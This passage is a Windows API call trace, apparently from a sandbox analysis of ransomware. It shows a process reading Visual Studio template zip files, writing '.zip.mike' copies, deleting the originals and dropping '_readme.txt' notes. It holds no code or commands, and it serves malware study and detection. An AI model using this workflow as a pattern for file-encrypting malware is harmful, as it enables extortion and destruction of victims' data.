lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AboutBox.zip.mike", lpFilePart=0x0) returned 0x6d [0128.112] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AboutBox.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AboutBox.zip.mike", lpFilePart=0x0) returned 0x6d [0128.112] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AboutBox.zip", dwFileAttributes=0x80) returned 1 [0128.112] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AboutBox.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\aboutbox.zip")) returned 1 [0128.114] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea54, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\_readme.txt", lpFilePart=0x0) returned 0x67 [0128.115] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0128.115] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfig.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfig.zip.mike", lpFilePart=0x0) returned 0x6e [0128.116] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfig.zip", nBufferLength=0x105, lpBuffer=0x2aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfig.zip", lpFilePart=0x0) returned 0x69 [0128.126] WriteFile (in: hFile=0x288, lpBuffer=0x21a9400*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2aefcc, lpOverlapped=0x0 | out: lpBuffer=0x21a9400*, lpNumberOfBytesWritten=0x2aefcc*=0x20c, lpOverlapped=0x0) returned 1 [0128.126] CloseHandle (hObject=0x288) returned 1 [0128.126] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfig.zip", nBufferLength=0x105, lpBuffer=0x2aeb94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfig.zip", lpFilePart=0x0) returned 0x69 [0128.126] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfig.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfig.zip.mike", lpFilePart=0x0) returned 0x6e [0128.126] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfig.zip.mike" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\appconfig.zip.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af094 | out: lpFileInformation=0x2af094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15a7f4c0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x15a7f4c0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x15aa5620, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x480)) returned 1 [0128.127] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfig.zip", nBufferLength=0x105, lpBuffer=0x2aeb94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfig.zip", lpFilePart=0x0) returned 0x69 [0128.127] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfig.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfig.zip.mike", lpFilePart=0x0) returned 0x6e [0128.127] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfig.zip.mike" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\appconfig.zip.mike"), fInfoLevelId=0x0, lpFileInformation=0x21aadb8 | out: lpFileInformation=0x21aadb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15a7f4c0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x15a7f4c0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x15aa5620, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x480)) returned 1 [0128.127] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfig.zip", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfig.zip", lpFilePart=0x0) returned 0x69 [0128.127] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfig.zip", dwFileAttributes=0x80) returned 1 [0128.127] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfig.zip", nBufferLength=0x105, lpBuffer=0x2aebc0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfig.zip", lpFilePart=0x0) returned 0x69 [0128.127] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfig.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\appconfig.zip")) returned 1 [0128.128] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfig.zip", nBufferLength=0x105, lpBuffer=0x2aebb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfig.zip", lpFilePart=0x0) returned 0x69 [0128.128] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfig.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\appconfig.zip"), fInfoLevelId=0x0, lpFileInformation=0x2af094 | out: lpFileInformation=0x2af094*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0128.129] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfig.zip", nBufferLength=0x105, lpBuffer=0x2aeb94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfig.zip", lpFilePart=0x0) returned 0x69 [0128.129] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aea54, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\_readme.txt", lpFilePart=0x0) returned 0x67 [0128.129] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\_readme.txt" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x288 [0128.130] GetFileType (hFile=0x288) returned 0x1 [0128.130] GetFileType (hFile=0x288) returned 0x1 [0128.130] WriteFile (in: hFile=0x288, lpBuffer=0x21accd0*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2aefe0, lpOverlapped=0x0 | out: lpBuffer=0x21accd0*, lpNumberOfBytesWritten=0x2aefe0*=0x45e, lpOverlapped=0x0) returned 1 [0128.131] CloseHandle (hObject=0x288) returned 1 [0128.131] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip", nBufferLength=0x105, lpBuffer=0x2aeb8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip", lpFilePart=0x0) returned 0x71 [0128.131] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip", nBufferLength=0x105, lpBuffer=0x2aeb08, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip", lpFilePart=0x0) returned 0x71 [0128.131] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\appconfiginternal.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0128.132] GetFileType (hFile=0x288) returned 0x1 [0128.132] GetFileType (hFile=0x288) returned 0x1 [0128.132] CloseHandle (hObject=0x288) returned 1 [0128.132] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip", nBufferLength=0x105, lpBuffer=0x2aeb8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip", lpFilePart=0x0) returned 0x71 [0128.132] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip", nBufferLength=0x105, lpBuffer=0x2aebb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip", lpFilePart=0x0) returned 0x71 [0128.132] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aeb3c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0128.133] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0128.133] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\appconfiginternal.zip"), fInfoLevelId=0x0, lpFileInformation=0x21aee44 | out: lpFileInformation=0x21aee44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x10f5dcf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8c501900, ftLastWriteTime.dwHighDateTime=0x1c9e43c, nFileSizeHigh=0x0, nFileSizeLow=0x26d)) returned 1 [0128.133] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip", nBufferLength=0x105, lpBuffer=0x2aebb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip", lpFilePart=0x0) returned 0x71 [0128.133] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\appconfiginternal.zip"), fInfoLevelId=0x0, lpFileInformation=0x21af218 | out: lpFileInformation=0x21af218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x10f5dcf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8c501900, ftLastWriteTime.dwHighDateTime=0x1c9e43c, nFileSizeHigh=0x0, nFileSizeLow=0x26d)) returned 1 [0128.133] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip", nBufferLength=0x105, lpBuffer=0x2aeb94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip", lpFilePart=0x0) returned 0x71 [0128.134] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip.mike", lpFilePart=0x0) returned 0x76 [0128.134] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip.mike" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\appconfiginternal.zip.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af094 | out: lpFileInformation=0x2af094*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0128.134] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip", lpFilePart=0x0) returned 0x71 [0128.134] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip", lpFilePart=0x0) returned 0x71 [0128.134] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip", nBufferLength=0x105, lpBuffer=0x2aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip", lpFilePart=0x0) returned 0x71 [0128.134] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip.mike", nBufferLength=0x105, lpBuffer=0x2aeb20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip.mike", lpFilePart=0x0) returned 0x76 [0128.134] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip.mike" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\appconfiginternal.zip.mike"), fInfoLevelId=0x0, lpFileInformation=0x2aeffc | out: lpFileInformation=0x2aeffc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0128.134] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip.mike", nBufferLength=0x105, lpBuffer=0x2aea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip.mike", lpFilePart=0x0) returned 0x76 [0128.135] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip.mike" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\appconfiginternal.zip.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0128.135] GetFileType (hFile=0x288) returned 0x1 [0128.135] GetFileType (hFile=0x288) returned 0x1 [0128.135] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aeef0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aeef0*=0) returned 0x0 [0128.135] WriteFile (in: hFile=0x288, lpBuffer=0x21b0580*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2aef9c, lpOverlapped=0x0 | out: lpBuffer=0x21b0580*, lpNumberOfBytesWritten=0x2aef9c*=0x220, lpOverlapped=0x0) returned 1 [0128.136] CloseHandle (hObject=0x288) returned 1 [0128.137] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\appconfiginternal.zip"), fInfoLevelId=0x0, lpFileInformation=0x21aff60 | out: lpFileInformation=0x21aff60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c501900, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x10f5dcf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8c501900, ftLastWriteTime.dwHighDateTime=0x1c9e43c, nFileSizeHigh=0x0, nFileSizeLow=0x26d)) returned 1 [0128.137] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip", nBufferLength=0x105, lpBuffer=0x2aea18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip", lpFilePart=0x0) returned 0x71 [0128.137] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\appconfiginternal.zip"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0128.137] GetFileType (hFile=0x288) returned 0x1 [0128.137] GetFileType (hFile=0x288) returned 0x1 [0128.137] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef9c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2aef9c*=0) returned 0x0 [0128.137] ReadFile (in: hFile=0x288, lpBuffer=0x21b1710, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2aefa8, lpOverlapped=0x0 | out: lpBuffer=0x21b1710*, lpNumberOfBytesRead=0x2aefa8*=0x26d, lpOverlapped=0x0) returned 1 [0128.250] CloseHandle (hObject=0x288) returned 1 [0128.251] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip.mike" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\appconfiginternal.zip.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0128.251] GetFileType (hFile=0x288) returned 0x1 [0128.251] GetFileType (hFile=0x288) returned 0x1 [0128.251] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aeef0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aeef0*=0) returned 0x220 [0128.252] WriteFile (in: hFile=0x288, lpBuffer=0x21b54ac*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x2aef9c, lpOverlapped=0x0 | out: lpBuffer=0x21b54ac*, lpNumberOfBytesWritten=0x2aef9c*=0x270, lpOverlapped=0x0) returned 1 [0128.252] CloseHandle (hObject=0x288) returned 1 [0128.252] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip.mike", nBufferLength=0x105, lpBuffer=0x2aea30, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip.mike", lpFilePart=0x0) returned 0x76 [0128.252] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip.mike" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\appconfiginternal.zip.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0128.252] GetFileType (hFile=0x288) returned 0x1 [0128.252] GetFileType (hFile=0x288) returned 0x1 [0128.253] WriteFile (in: hFile=0x288, lpBuffer=0x21b8740*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2aefcc, lpOverlapped=0x0 | out: lpBuffer=0x21b8740*, lpNumberOfBytesWritten=0x2aefcc*=0x20c, lpOverlapped=0x0) returned 1 [0128.254] CloseHandle (hObject=0x288) returned 1 [0128.254] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip", nBufferLength=0x105, lpBuffer=0x2aeb94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip", lpFilePart=0x0) returned 0x71 [0128.254] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip.mike", lpFilePart=0x0) returned 0x76 [0128.254] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AppConfigInternal.zip.mike" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\csharp\\1033\\appconfiginternal.zip.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af094 | out: lpFileInformation=0x2af094*(dwFileAttributes=0x20, 